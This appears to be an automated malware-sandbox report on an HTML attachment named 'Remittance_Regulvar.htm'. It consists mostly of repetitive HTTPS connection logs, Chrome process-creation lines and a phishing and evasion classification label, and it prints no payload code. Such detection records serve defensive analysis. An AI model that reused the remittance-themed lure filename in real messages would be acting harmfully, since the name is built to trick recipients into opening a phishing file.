Source: unknownNetwork traffic detected: HTTP traffic on port 52326 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52511
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52527
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52525
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52529
Source: unknownNetwork traffic detected: HTTP traffic on port 53475 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52520
Source: unknownNetwork traffic detected: HTTP traffic on port 52453 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52523
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52521
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52522
Source: unknownNetwork traffic detected: HTTP traffic on port 53222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53652 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52338 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51207
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52538
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52539
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51205
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52536
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52537
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51209
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52530
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52531
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51203
Source: unknownNetwork traffic detected: HTTP traffic on port 51396 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52534
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52535
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51201
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52532
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52533
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53336 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52276 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51254 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52314 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52549
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51219
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52547
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51217
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52548
Source: unknownNetwork traffic detected: HTTP traffic on port 53590 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51384 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52541
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51211
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52542
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52540
Source: unknownNetwork traffic detected: HTTP traffic on port 53234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52545
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51215
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52546
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52543
Source: unknownNetwork traffic detected: HTTP traffic on port 53664 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52544
Source: unknownNetwork traffic detected: HTTP traffic on port 52149 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53361 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52441 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52592 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52288 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53499 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52477 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51372 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51139 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51498 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53209 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53639 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51360 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53640 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51409 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53487 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52465 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52505
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52506
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52503
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52504
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52509
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52507
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52508
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52501
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52502
Source: unknownNetwork traffic detected: HTTP traffic on port 53513 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52500
Source: unknownNetwork traffic detected: HTTP traffic on port 51966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51278 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51536 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52475
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51145
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52476
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52473
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51143
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52474
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52479
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51149
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52477
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51147
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52478
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51151
Source: unknownNetwork traffic detected: HTTP traffic on port 52146 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52482
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
Source: unknownNetwork traffic detected: HTTP traffic on port 52387 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52483
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52480
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52481
Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53414 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52444 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53655 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52375 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52432 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51611 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52486
Source: unknownNetwork traffic detected: HTTP traffic on port 51840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52487
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51153
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52484
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52485
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51159
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51157
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52488
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52489
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52490
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
Source: unknownNetwork traffic detected: HTTP traffic on port 51347 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52493
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52494
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52491
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51161
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52492
Source: unknownNetwork traffic detected: HTTP traffic on port 52810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52158 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52546 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52497
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51167
Source: unknownNetwork traffic detected: HTTP traffic on port 52215 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52498
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52495
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52496
Source: unknownNetwork traffic detected: HTTP traffic on port 51152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52499
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51173
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
Source: unknownNetwork traffic detected: HTTP traffic on port 51623 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53196 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
Source: unknownNetwork traffic detected: HTTP traffic on port 52834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51359 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51177
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51175
Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51179
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51181
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
Source: unknownNetwork traffic detected: HTTP traffic on port 51588 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51185
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51183
Source: unknownNetwork traffic detected: HTTP traffic on port 53333 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52110 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51257 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52439
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51109
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52437
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51107
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52438
Source: unknownNetwork traffic detected: HTTP traffic on port 51876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52431
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52432
Source: unknownNetwork traffic detected: HTTP traffic on port 52775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52435
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52436
Source: unknownNetwork traffic detected: HTTP traffic on port 52605 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52433
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51103
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52434
Source: unknownNetwork traffic detected: HTTP traffic on port 51942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51323 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52534 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52448
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52449
Source: unknownNetwork traffic detected: HTTP traffic on port 52109 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51111
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52442
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52440
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52441
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51115
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52087 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52446
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52444
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
Source: unknownNetwork traffic detected: HTTP traffic on port 51269 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52445
Source: unknownNetwork traffic detected: HTTP traffic on port 53014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52450
Source: unknownNetwork traffic detected: HTTP traffic on port 52351 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52468 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
Source: unknownNetwork traffic detected: HTTP traffic on port 51188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52459
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51129
Source: unknownNetwork traffic detected: HTTP traffic on port 51335 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52453
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51123
Source: unknownNetwork traffic detected: HTTP traffic on port 51864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52454
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52451
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52452
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52457
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51127
Source: unknownNetwork traffic detected: HTTP traffic on port 52363 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52456 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52458
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52455
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51125
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52456
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52460
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52461
Source: unknownNetwork traffic detected: HTTP traffic on port 53714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53286 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51139
Source: unknownNetwork traffic detected: HTTP traffic on port 53026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52522 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51133
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52464
Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
Source: unknownNetwork traffic detected: HTTP traffic on port 51242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52465
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51131
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52462
Source: unknownNetwork traffic detected: HTTP traffic on port 53643 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52463
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51137
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52468
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52469
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51135
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52467
Source: unknownNetwork traffic detected: HTTP traffic on port 53549 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52471
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51141
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52472
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52470
Source: unknownNetwork traffic detected: HTTP traffic on port 51270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51406 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51471 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52063 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51282 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52493 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52509 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51539 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51540 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53292 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52510 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53308 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51660 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52481 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51483 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51495 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51311 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52075 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52763 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:51298 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:51306 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:51421 version: TLS 1.2

System Summary

barindex
Source: Name includes: Remittance_Regulvar.htmInitial sample: remit
Source: classification engineClassification label: mal60.phis.evad.winHTM@83/1592@925/100
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Remittance_Regulvar.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,9857401781913003249,9453999755188158547,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4012 --field-trial-handle=1996,i,9857401781913003249,9453999755188158547,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,9857401781913003249,9453999755188158547,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
